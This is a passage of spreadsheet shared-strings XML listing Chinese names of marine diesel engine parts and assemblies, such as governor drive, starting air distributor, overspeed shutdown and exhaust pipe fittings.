        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速安全装备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气缸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动气缸阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带管升压器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向启动空气分配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带盖齿轮箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带同步器齿轮箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁操纵台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配点</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车设备布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速关闭阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>升压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力转化器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大停车限位螺钉布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速停车</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油箱布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>精调</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁铁支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速计装备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整扭</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统补充</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气滑块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气系统布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>RCF/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器订单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>BWIII/RKAV/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器订单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>BWIII/GCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订单</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO/CFE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>RCF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订单</t>
    </r>
  </si>
  <si>
    <r>
      <t>DMG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订单</t>
    </r>
  </si>
  <si>
    <r>
      <t>BL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订单</t>
    </r>
  </si>
  <si>
    <r>
      <t>GCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订单</t>
    </r>
  </si>
  <si>
    <r>
      <t>RCF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力涡轮滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力涡轮密封空气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号设备附件接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀和泵的齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀供图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带导块的轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚针轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯头接合</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带包装的螺帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器供货</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭矩补偿器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带轴承的刮油环盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条张紧器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油量调节器螺塞组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带裙法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可选单向阀布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>鼓风机密封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输送管护套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱检修孔盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气连接块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮联轴节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝水排泄布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接的排气阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍连接的排气阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍连接的支管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍连接的中间管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍连接的增压器十字管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍连接的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型管上端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍连接的增压器弯管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀隔热层</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰接头绝热</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器详细资料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管钢板</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸排烟管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
